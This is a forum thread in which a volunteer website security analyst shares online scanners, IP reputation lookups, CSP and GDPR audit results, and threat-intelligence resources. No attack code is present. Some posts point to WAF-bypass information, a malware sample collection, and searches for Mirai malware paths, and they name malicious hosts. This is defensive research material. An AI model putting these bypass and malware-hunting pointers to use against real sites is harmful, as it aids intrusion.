There are over 50.000 Word Press plugins and new ones created every day,
and also some left by their developers (left vulnerable code).

Those attacked recently Duplicator, ThemeGrill Demo Importer,  Profile Builder, various WooCommerce plugins, ThemeREX,
Async JS, Modern Events Calendar, Google Maps plug-in. (info source - malware dot com dot blog).

Do a quick and dirty at https://hackertarget.com and perform a free Word Press security scan there.
Do a passive scan: https://hackertarget.com/wordpress-security-scan/

Another low-impact scanner: http://wprecon.com/

polonus (volunteer 3rd party cold recon website security analyst and website error--hunter)
Title: Re: Tests and other Media topics
Post by: bob3160 on December 11, 2021, 02:42:33 PM
No desktop no add-ons
adds up to
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/11/13/41/crlXIpV2tC0/preview.jpg)


Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2021, 05:59:57 PM
Go on testing and analyzing with a robots.txt tester and validator:
https://www.websiteplanet.com/webtools/robots-txt/?url=forum.avast.com

No results for this one, because the forum is not indexable; only links to be followed.

But here 1 error and 8 warnings: https://www.websiteplanet.com/webtools/robots-txt/?url=wordpress.com

Good informative info for website developers,

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2021, 06:15:25 PM
The following test page should give you an error inside the browser:
https://pinning-test.badssl.com/

This site is preloaded with a bad HPKP pin.
Checks your https-security is OK. No guv-snooping certs implemented?

Excellent test: https://www.ssllabs.com/ssltest/analyze.html?d=pinning-test.badssl.com

And for other online scanners: https://geekflare.com/ssl-test-certificate/

OK inside your browser? Re: https://www.howsmyssl.com/

pol



Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2021, 01:16:30 AM
Many fine tools grouped here: https://dnschecker.org/website-server-software.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2021, 01:00:37 PM
CSP not implemented according to best policies:
Even on a site like:
https://transparencyreport.google.com/safe-browsing/search?url=forum.avast.com
Quote
Result
CSP Protection Active
CSP Reporting Full
CSP Validity Valid

XSS Strong CSP Protection
Clickjacking No CSP Protection
Formjacking Weak CSP Protection

General
Weak CSP Protection
Summary
6 Fatal Errors
10 Warnings
6 Info
4 Valid
Content Security Policy (CSP)
Edit CSP
script-src
  'nonce-aPfse2kvXXXXXXBu8VkzKA'
  'report-sample'
  'unsafe-inline';
object-src
  'none';
base-uri
  'self';
worker-src
  'self';
report-uri
  /cspreport;
General
CSP
report-uri
Add another 'report-uri' to get better violation reports.
form-action
This directive does not fallback to 'default-src'. Can you restrict 'form-action' to 'none' or 'self'?
Necessary Directives
CSP
default-src
'default-src' is missing. Add it for more fine-grained control and reporting.
CSP
base-uri
CSP
frame-ancestors
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
'frame-ancestors' directive, is more powerful and flexible than the X-Frame-Options, and considered necessary in order to properly prevent Clickjacking attacks. Can you restrict 'frame-ancestors' to 'none' or 'self'?
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
CSP
upgrade-insecure-requests
Add 'upgrade-insecure-requests' to protect from ManInMiddle attacks. Another (more strict) option is to use 'block-all-mixed-content' to block mixed content resources (rather than updgrade to secure).
Scripting Directives
CSP
script-src
CSP
style-src
'style-src' is missing and recommended to increase general protection. Can you set 'none' or a specific file/path?
CSP
object-src
CSP
worker-src
Frames Directives
CSP
child-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
CSP
frame-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
Content Directives
CSP
img-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'img-src' is missing. Add it for more fine-grained control and reporting.
CSP
connect-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'connect-src' is missing. Add it for more fine-grained control and reporting.
CSP
font-src
'font-src' is missing. Add it for more fine-grained control and reporting.
CSP
manifest-src
'manifest-src' is missing. Add it for more fine-grained control and reporting.
CSP
media-src
'media-src' is missing. Add it for more fine-grained control and reporting.
CSP
prefetch-src
'prefetch-src' is missing. Add it for more fine-grained control and reporting.
resulting in a B-Grade protection.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 27, 2021, 06:36:45 PM
Website security analysis - Snyk: https://snyk.io/test/website-scanner/?test=
Best result = A, bad result = F.

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2021, 11:35:27 PM
Hi folks on the avast support forums. From me best wishes for the coming New Year 2022.
May you stay free of any mishap both offline as well as online.

This time my question was: ""Who is behind CloudFlare?".

Whenever you do an IP look-up at a CloudFlare protected website, like for instance shodan.io,
CloudFlare may block you as a visitor. This is whenever they cannot fully identify you.
You cannot go there anonymously. No tor-users are allowed on their platform either,
even when you aren't into any mischief.
You are banned until you can give proof of who you really are as a human being (real IP).

In such cases it can be interesting to know who is behind a certain CloudFlare reversed proxy address.
You can look it up at: https://securitytrails.com/list/ip/104.18.12.238  (example for shodan.io) (random example by me, pol).

Mind to do your look-ups at securitytrails.com not from behind a proxy, else you also meet with their endless captcha,
even when you are not a bot and strictly a human anonymous. They also are CloudFlare driven.

It is a pity the extension to see whether one was safe from NSA spoofing on a particular website,
is now no longer available as a Google's or cromium extension.
Their new extension and api restricting settings will make blocking etc. much harder.
Coming to a browser near you in the forecoming months, I think May 2022.

A couple of extension developers have already thrown the towel into the developer's ring.
Well the going gets narrow, as some clamps seem to be coming down.

It is a pity really and actually a shame for the last bit of end-user-autonomy.
I use a London-based in-browser proxy by Digital Ocean in the browser
and have experienced above scenario various times.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 07, 2022, 01:10:45 AM
Learn more device info via your browser of choice here:
https://www.deviceinfo.me/

Scan, scroll down and enjoy.

An ip-scan for malicious and suspicious IP and percentages on ranges:
https://maltiverse.com/ip/161.35.53.213  (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 15, 2022, 01:37:34 PM
Test your domain to be GDPR-compliant: https://2gdpr.com/

These our forums had the following issues:

Prior consent to other than strictly necessary cookies (ePrivacy)
Possible problems! Hide
What's the Problem:
Cookies installed during the loading of pages are not strictly necessary. For EU users these cookies can be installed after obtaining prior consent (Rec. 30 and Rec. 32 of the GDPR)

How to Solve it:
On the site you need to install prominent and specific cookie-banner with a consent form to get user consent, or to block cookies in case of consent refusal. You can create such cookie consent here

Pages list:
Below are the webpages loaded and cookies that require prior consent from EU users to be installed:

https://forum.avast.com/index.php?topic=315188.msg1675451
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?action=help
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?action=search
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=125.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?topic=315479.msg1675505
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=126.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=127.0
Cookie (Google Analytics): _gid; _ga; _gat;
https://forum.avast.com/index.php?board=128.0
Cookie (Google Analytics): _gid; _ga; _gat;

Like in Austria this could mean Google Analytics can no longer be used in the EU.

Steps that could be taken to make Google 'Analytrics' being more privacy compliant, script:
Quote
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id= UA- xxxxxxx-x "></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-xxxxxxx-x', { 'anonymize_ip': true }); // ##: This to enable IPmasking
</script>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 15, 2022, 10:52:12 PM
I should admit, that the script that is being presented in the previous posting (quote)
is more or less a form of window-dressing, because that IP has being loaded from Googles servers beforehand anyway. That IP has been made pseudo-anonymous. Google can calculate it anyway.
Actually google-analytics is 'spook-ware', coming with all that javascript included.

Through just this line of code Google knows the IP through that script being loaded,
<script async src="htxps://www.googletagmanager.com/gtag/js?id= UA- xxxxxxx-x "></script>
<script>

So as coming from the EU we users may find websites outside of the EU blocking us.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2022, 03:33:26 PM
Whenever one finds oneself blocked from CloudFlare's, it could be helpful to know the real IP of that particular website: https://shadowcrypt.net/tools/cloudflare

Other interesting tools can be found there also: https://shadowcrypt.net/tools/tor-checker

And this one: https://shadowcrypt.net/tools/asn-finder
Random example:
Quote
Results of 122.161.48.17


   


   

       
       
   

    122.161.48.0/20
PACNET (proxy-registered route object)
This route object is for a PACNET customer route which is
This route object was created because no existing route
ANC peers filter based on these objects this route
  122.161.48.0/24

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 22, 2022, 04:58:46 PM
Tested IP leaks for my browser VPN, see: https://www.whatsmydns.net/#A/138.68.180.132
at //www.top10vpn.com/tools/do-i-leak/

Results:
IPv4/IPv6             No Leak
DNS                     No Leak
WebRTC                No Leak
Geolocation           No Leak
Additional Tests     No Leak

Testing the Great Firewall now using BLOCKY:
https://blocky.greatfire.org/

Recently blocked: https://en.greatfire.org/https/forum.avast.com/index.php%
No censorship detected October last: https://blocky.greatfire.org/detail/169946/http%3A%2F%2Fforum.avast.com

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 01:37:57 PM
DNS checker: https://www.nslookup.io/dns-records/bitchute.com (random example)

Also: https://mxtoolbox.com/SuperTool.aspx?action=dns%3abitchute.com&run=toolpage

Checked against Cloudflare Resover Tool: https://shadowcrypt.net/tools/cloudflare

Also consider: https://dnschecker.org/ip-location.php?ip=67.205.164.246

See: https://dnschecker.org/mx-lookup.php?query=bitchute.com&dns=opendns

Re-analyzed: https://dnsviz.net/d/bitchute.com/dnssec/
Server status: https://dnsviz.net/d/bitchute.com/servers/
and https://www.shodan.io/host/108.162.192.119

Enjoy my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 03:01:32 PM
Scamalytics of a coinbase tollfree number spammer.

Reported here: https://ip-46.com/95.215.45.68#ip-feeds

Squid vulnerabilities on server: https://www.shodan.io/host/95.215.45.68

Fraud score: 43 -> https://scamalytics.com/ip/95.215.45.68

Hox VPN data: https://spur.us/context/95.215.45.61 (self-advertising data)

IP involved here: https://www.hybrid-analysis.com/sample/64f4c8bdec5ede3a53a7622c072eff4ece6bf5cab599a148bc639d074b5c8be1?environmentId=100

Raychat data: https://intelx.io/?s=95.215.45.68
Read: https://www.spiderfoot.net/how-much-data-do-you-leak-online-unintentionally/  (source info credits go to SM7 software)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 23, 2022, 10:53:07 PM
Information to circumvent CloudFlare blocking from behind a proxy or VPN,
use the CloudFlare resolver tool: https://shadowcrypt.net/tools/cloudflare
and also via the info here at https://waf-bypass.com for CloudFlare, Amazon etc. etc.

Also handy when the newly planned EU DNS with URL-filter will be implemented,
or whenever one is being blocked working a tor browser.

Big Brother will be inviting you to a cat- and mouse-game for the last remnants of your privacy and free info gathering. That is what the future has in store for us all (opinion-checking etc.).

Test your WAF online here: https://labs.cloudbric.com/wafer/waf (change DNS to verify)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2022, 11:43:37 AM
Report a PHISH to the Phish-bowl:
https://uthsc.edu/its/cybersecurity/phish-bowl.php

Phishing-investigation:
https://xsoar.pan.dev/docs/reference/playbooks/phishing-investigation---generic-v2

Fighting scam and spam on the Interwebz:
https://419scam.org/emails/2022-01/04/02115157.92.htm  (random example)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2022, 02:08:54 PM
20.000 Word Press CMS websites found vulnerable to critical PHP leaks.

Only 31% of such websites have chosen to patch:
https://wordpress.org/plugins/php-everywhere/advanced/

See how weak PHP and fatal errors in coding can easily produce disaster:
https://www.fatalerrors.org/a/php-weak-type-code-commadn-injection.html

So with PHP-encoded CMS:  "Don't EVER trust user input anywhere".

Have a slick website developed. But forget to spend money on any maintanance.
So weak PHP, later a small exploit, and your website can get hacked and worse.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 12, 2022, 05:38:23 PM
Various online tools, example : https://online-toolz.com/tools/html-validator.php

When valid you get "valid". Valid found here: -fusedeck.com (random example).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 14, 2022, 12:04:41 PM
Scanned this particular random site through
@ https://www.web-malware-removal.com/website-malware-virus-scanner/

Cloaking found on the webserver.
Server Details:

apache

Google and Web-Browser Content different!
Google: 63763 bytes       Firefox: 63967 bytes,    Diff:   204 bytes

l" class="rss_link">rss</a> <a href="hxtps://twitter.com/securitynl" target="_blank" class="twitter_link">twitter</a> </div> </div> </div> </div> </body> </html> ...

Above was found using Free Website Malware / Virus Scan

The cloaking was not found to rside on the website while scanning at:
https://isithacked.com/check

polonus (3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on February 15, 2022, 05:20:19 PM
IP look-up -> https://www.robtex.com/ip-lookup/103.92.43.40#quick
then https://www.threatminer.org/host.php?q=103.92.43.40#gsc.tab=0&gsc.q=103.92.43.40&gsc.page=1
then https://www.abuseipdb.com/check/103.92.43.40 and https://www.projecthoneypot.org/ip_103.92.43.106

abuse - dictionary attacker, Indian top mail server and accordingly mail abuse.

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 17, 2022, 04:04:38 PM
Stable Trackers List - intresting:
https://newtrackon.com/list

Random examples:
Quote
-dp://tracker.dler.com:6969/announce

-udp://fe.dealclub.de:6969/announce

-udp://movies.zsw.ca:6969/announce

-udp://6ahddutb1ucc3cp.ru:6969/announce

udp://abufinzio.monocul.us:6969/announce

-http://btracker.top:11451/announce

-udp://vibe.sleepyinternetfun.xyz:1738/announce

-udp://tracker.torrent.eu.org:451/announce

-udp://tracker.auctor.tv:6969/announce

-https://tr.burnabyhighstar.com:443/announce

-udp://tracker.sylphix.com:6969/announce

-udp://torrentclub.space:6969/announce

-udp://tracker.srv00.com:6969/announce

-udp://tracker.opentrackr.org:1337/announce
etc. etc.

Not being flagged elsewhere, see: https://quttera.com/detailed_report/torrentclub.space

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 18, 2022, 05:40:16 PM
How did you score here? Instant Security Scan by Zscaler's.
Re: http://securitypreview.zscaler.com/#

pol
Title: Re: Tests and other Media topics
Post by: DavidR on February 18, 2022, 06:20:56 PM
How did you score here? Instant Security Scan by Zscaler's.
Re: http://securitypreview.zscaler.com/#

pol

I don't know if this was also your intent as the http prefix triggers Firefox http every check.

Allowing it does a redirect to what is also an http page, which is pretty poor on the part of Zscaler when this is supposedly a security based check ???

So I didn't proceed any further, who knows if they would then spring a 'what are you doing visiting non https pages' comment.
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2022, 04:10:15 PM
Hi DavidR,

Thank you for your well appreciated comments.
I gave the Zscaler online scanner info as I found it online.

There seems to exist more and more online that is not quite keeping up to standards as we have known them in the past
(from 1998 up and until now). Every av-vendor and also Zscaler has now jumped the data-slurping band-waggon.

Front-ends appearing like intelx.io and https://nitter.eu (https://nitter.eu) (Enter username). Intelligence for couch-potatoes. ;)

Then this for instance data towards a certain end (an utterly and completely random choice by me, pol):
https://metrics.torproject.org/rs.html#details/4AA0035604DF40E5BA20DBE88EF6D11432421BFA (https://metrics.torproject.org/rs.html#details/4AA0035604DF40E5BA20DBE88EF6D11432421BFA)
&
https://udger.com/resources/ip-list/tor_exit_node (https://udger.com/resources/ip-list/tor_exit_node)
&
https://github.com/SecOps-Institute/Tor-IP-Addresses (https://github.com/SecOps-Institute/Tor-IP-Addresses)

To know what to be up against with cybercrime and alleged cybercrime, one has to study much, hence read and read.
Your adversary also does, so we cannot do without. So please go on and further comment the contents of this thread.

I just like to trigger end-users awareness. To generally being dumbed down is a process we all will undergo more and more anyway.
So to go up against and reverse this process a bit towards awarding and good ends is what I venture out for.
Sort of see that as my mission here as a website error-hunter of sorts.

your avast-forum-friend,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2022, 05:04:51 PM
To know threat isues -> https://maltiverse.com/ip/51.15.7.157
and https://www.ip-lookup.org/location/51.15.7.157
and https://www.maxmind.com/en/high-risk-ip-sample/51.15.7.157
and https://www.abuseipdb.com/check/51.15.7.157  (important as IP-info-resources)

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 01, 2022, 04:29:40 PM
Test DNS Propagation:

https://dnsmap.io/#A/
https://www.whatsmydns.net/#A/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2022, 01:34:06 PM
Also good to have inside your IP-checking-tool-chest:
https://ipinfo.info/html/ip_checker.php

Something to check against: https://blackip.ustc.edu.cn/sshrawlist.php?ip=37.49.226.220 (random example given).
and https://ipinfolookup.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on March 05, 2022, 01:43:57 PM
See what tracking techniques a website may use:

https://themarkup.org/blacklight?url=  (A Real-Time Website Privacy Inspector
By Surya Mattu)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 18, 2022, 10:04:36 PM
Very helpful in fighting scam:
https://www.scam-detector.com/'
Also use the website validator there.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 22, 2022, 11:35:11 AM
94,7% of websites will not honor your cookie preferences.
One could therefore install this extension to get rid of cookies that you do not want to allow in.
https://chrome.google.com/webstore/detail/cookieblock/fbhiolckidkciamgcobkokpelckgnnol?hl=en

See: https://karelkubicek.github.io/post/cookieblock

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 26, 2022, 06:23:30 PM
Code page search engine, example -> https://publicwww.com/websites/caf.js/

Or in the case of this cloaking parked-website adsense ad-campaign:
https://publicwww.com/websites/parking.bodiscdn.com/

Then search on here: https://intelx.io/?s=+http%3A%2F%2Fww1.torrent9.bz%2F

Enjoy, my good friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 27, 2022, 02:33:04 PM
With such specific search-engines there is a possibility to search for malware code-snippets, like of Mirai bot-malware, bitcoin darknet, so we searched bins/ppc (pay per click) found up at URLhaus -> https://urlhaus.abuse.ch/browse/

See results: https://publicwww.com/websites/bins%2Fppc/   359 webpages in all waiting to be analyzed.

Also see this for bin/sh mips/Mozi/elf malware: https://publicwww.com/websites/bin%2Fsh/
But mind not all results will answer to what we are searching for, we have to discriminate.

Or we have to sign up for paid results in case of a search for bins/arm6 depth:all
Also more here: https://www.guardicore.com/botnet-encyclopedia/bins/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 27, 2022, 04:44:40 PM
Investigating banned crawl.baidu.com for baidu spider:
https://www.fortypoundhead.com/botinfo.asp?rid=153
https://www.fortypoundhead.com/tools_ipcheck_detail.asp?banid=567174
https://rdnsdb.com/116.179.32.0/24
and https://publicwww.com/websites/crawl.baidu.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 28, 2022, 03:35:51 PM
Why here this site is not given as insecure, as Google Safebrowsing does.
Re: htxps://lb.larevet.net/ -> https://dnslytics.com/ip/147.78.144.6
Missed here: https://www.virustotal.com/gui/url/58e823564e976ab653a4e5d47d17b9b49aac1d26f784e5682f33d1935056b7da
Connection is not private:
NET::ERR_CERT_COMMON_NAME_INVALID
Subject: *.geneanet dot org  (do not go there as avast flag this as a phishing site!).

Issuer: Gandi Standard SSL CA 2

Expires on: 11 mar 2023

Current date: 28 mar 2022

PEM encoded chain:
-----BEGIN CERTIFICATE-----
MIIGMzCCBRugAwIBAgIRAJnvRbQbrOGRT5BHeHYJAgYwDQYJKoZIhvcNAQELBQAw
XzELMAkGA1UEBhMCXXXXXXXXXXXXXXXXXXXXcmlzMQ4wDAYDVQQHEwVQYXJpczEO
MAwGA1UEChMFR2FuZGkxIDAeBgNVBAMTF0dhbmRpIFN0YW5kYXJkIFNTTCBDQSAy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2022, 01:20:28 PM
Resources to search: https://maltiverse.com/search;query=lb01.parklogic.com;page=1;sort=creation_time_desc

Searching using a known malicious address query: ( do not click  any links to malware) https://maltiverse.com/search;query=alibiaba.bugs3.com;page=2;sort=creation_time_desc
and then stumbling unto this malware analysis: https://maltiverse.com/url/c14b2080fbe8d03f30d4030d00e6da522533fe4e276d2387cb52ca0942748fd1

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on April 05, 2022, 06:44:43 PM
Genuine scansite or just to get clickbait?
Re: https://www.scamvoid.net/check/qanator.com/  (not flagged as a scam).
Not flagged here either: https://www.virustotal.com/gui/url/66ea09f3b796804db46fbb98b33e1513b60c8fbc12e403ff28ea36925e4e3114
See: bootstrap   4.0.0-beta   Found in -https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js _____Vulnerability info:
Medium   XSS is possible in the data-target attribute. CVE-2016-10735   

Functioning in browser according to console info
Quote
Failed to load resource: net::ERR_BLOCKED_BY_CLIENT
VM210:81 audioblocktrue
VM210:130 canvasfont = true
qanator.com/:1 Unchecked runtime.lastError: Could not establish connection. Receiving end does not exist.
qanator.com/:1 Failed to find a valid digest in the 'integrity' attribute for resource '-https://code.jquery.com/jquery-3.2.1.slim.min.js' with computed SHA-256 integrity 'hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4='. The resource has been blocked.
qanator.com/:1 Failed to find a valid digest in the 'integrity' attribute for resource '-https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js' with computed SHA-256 integrity '/ijcOLwFf26xEYAjW75FizKVo5tnTYiQddPZoLUHHZ8='. The resource has been blocked.
bootstrap.min.js:6 Uncaught Error: Bootstrap's JavaScript requires jQuery. jQuery must be included before Bootstrap's JavaScript.
    at bootstrap.min.js:6
dD.js:1467
(unknown) Settings loaded...
intercept.js:1 Filter Running...
qanator.com/:1 Unchecked runtime.lastError: The message port closed before a response was received.
DevTools failed to load SourceMap: Could not load content for chrome-extension://gegfpbhjnhegdnjdkghhnneaocdbbhjp/firefox/browser-polyfill.min.js.map: HTTP error: status code 404, net::ERR_UNKNOWN_URL_SCHEME

Probably not functioning because blocked by CloudFlare for being behind a DigitalOcean proxy from London City.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 10, 2022, 07:02:52 PM
Maltiverse - versatile resources:
Here we will find various collections:
https://maltiverse.com/url/131adc8b091ddae67842065614a663af6dc7b42fceb3bef55841667b8639a578

Can be combined with other resources as https://urlhaus.abuse.ch/

Here in this case just for researchers only: -https://github.com/HynekPetrak/javascript-malware-collection
(Do not venture out there...)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 29, 2022, 04:24:31 PM
Checking on last bad events from another resources: https://www.projecthoneypot.org/list_of_ips.php
Example: https://www.abuseipdb.com/check/134.119.216.167

Attacker into SQL-injection attacks. 

Also reported here manifold: https://ip-46.com/134.119.216.167

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 30, 2022, 11:04:06 AM
Also interesting to check on (spam) mail-harvesters, random example starting here: https://www.projecthoneypot.org/ip_46.4.55.55

Then checked on associated IP, 136.144.41.200 -

https://www.abuseipdb.com/check/136.144.41.200

https://www.psbl.org/listing?ip=136.144.41.200

https://multirbl.valli.org/detail/score.spfbl.net.html

https://maltiverse.com/ip/136.144.41.200   

https://www.shodan.io/host/136.144.41.200

For users with a special interest in the subject of spam:
https://forum.spamcop.net/topic/47073-serverion-spam-factory-review/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 17, 2022, 11:58:05 AM
Torry.io , the Tor Anymous View search engine,
random query example: https://tor.torry.io/index.php?q=

Any downcasts in mapping the Tor-driven landscape? Can also be used as an extension inside Google chrome browser,
and similar browser types. Whenever the searchg-engine is too good to be true anonymous searching, then it likely is.
Anyone? I see a link to -hs.qacono.com,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 19, 2022, 07:24:59 PM
Could this be an alternative to the once WOT service?

Random example: https://www.scamdoc.com/view/877444

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2022, 05:02:21 PM
Even Sucuri's website scan page does not have best policy CSP.

Issues:
Quote
CSP Validity         Valid
XSS                     No CSP Protection
Clickjacking          No CSP Protection
Formjacking         No CSP Protection

General
Basic CSP Protection
Summary
11 Fatal Errors
12 Warnings
5 Info
1 Valid
Content Security Policy (CSP)
Edit CSP
upgrade-insecure-requests;
Report Only CSP
Enforced CSP
General
CSP
report-uri
Add 'report-uri' directive to receive violation reports. Setup a free report-uri at RapidSec
CSP
form-action
In order to add Formjacking protection, either 'form-action' or 'base-uri' should be strictly defined.
This directive does not fallback to 'default-src'. Can you restrict 'form-action' to 'none' or 'self'?
Necessary Directives
CSP
default-src
'default-src' is missing. Add it for more fine-grained control and reporting.
CSP
base-uri
In order to add Formjacking protection, either 'form-action' or 'base-uri' should be strictly defined.
Missing 'base-uri' allows the injection of base tags that set the base URL for all relative URLs. Used in XSS as CSP bypasses on the 'script-src' directive, and in Formjacking attacks - routing forms to an attacker controlled domain. Can you set it to 'none' or 'self'?
CSP
frame-ancestors
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
'frame-ancestors' directive, is more powerful and flexible than the X-Frame-Options, and considered necessary in order to properly prevent Clickjacking attacks. Can you restrict 'frame-ancestors' to 'none' or 'self'?
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
CSP
upgrade-insecure-requests
Scripting Directives
CSP
script-src
In order to add XSS protection, 'script-src' should be strictly defined.
'script-src' is missing and recommended to increase XSS protection. Can you set 'none' or a specific file/path?
CSP
style-src
'style-src' is missing and recommended to increase general protection. Can you set 'none' or a specific file/path?
CSP
object-src
Missing 'object-src' allows the injection of plugins which can execute JavaScript. Can you set it to 'none' or 'self'?
CSP
worker-src
'worker-src' is missing and recommended to increase overall strength. It specifies valid sources for Worker, SharedWorker, or ServiceWorker scripts. Can you set 'none' or a specific file/path?
Frames Directives
CSP
child-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
CSP
frame-src
In order to add Clickjacking protection, either 'frame-ancestors', 'frame-src' or 'child-src' should be strictly defined.
As strict as 'frame-ancestors', 'frame-src' and 'child-src' will be ('self', 'none' or strict path allowlist), Clickjacking protection will be strongest.
For backward compatability, both 'child-src' and 'frame-src' should exist in order to protect Clickjacking, Formjacking, Data Exfiltration and more.
Content Directives
CSP
img-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'img-src' is missing. Add it for more fine-grained control and reporting.
CSP
connect-src
In order to add general protection, either 'img-src' or 'connect-src' should be strictly defined.
'connect-src' is missing. Add it for more fine-grained control and reporting.
CSP
font-src
'font-src' is missing. Add it for more fine-grained control and reporting.
CSP
manifest-src
'manifest-src' is missing. Add it for more fine-grained control and reporting.
CSP
media-src
'media-src' is missing. Add it for more fine-grained control and reporting.
CSP
prefetch-src
'prefetch-src' is missing. Add it for more fine-grained control and reporting.
source CSP Scanner chrome extension info...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2022, 11:56:25 AM
Tested forum.avast.com at The Markup,
and no tracking found, but user data are being sent to Google Analytics.
Adblockers will block this.

See: https://themarkup.org/blacklight?url=forum.avast.com

Site is non-indexable, links on the page are followed.
No unsafe content being detected, no iframe redirections, no encoded JS,
no external domain requests, no trackers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 07, 2022, 02:42:57 PM
Sometimes one has to combine resources, like here on this Crimson RAT Malware:
https://urlhaus.abuse.ch/url/2228451/  and  https://any.run/malware-trends/crimson
and https://www.shodan.io/host/64.188.25.143
This while only 3 vendors detect this here: https://www.virustotal.com/gui/url/022eb1cfa39cf0b2f63fef31c878545716b766c2cd37d59d61e8cc93d876259e
Blacklisted by McAfee: https://sitecheck.sucuri.net/results/64.188.25.143/day.txt
All this abuse despite of a very strict abuse policy from -static.quadranet dot com.
not yet reported here, bu similar to spam and scam reported for this IP:
https://www.abuseipdb.com/check/64.188.2.110 @ quadranet dot com.


polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
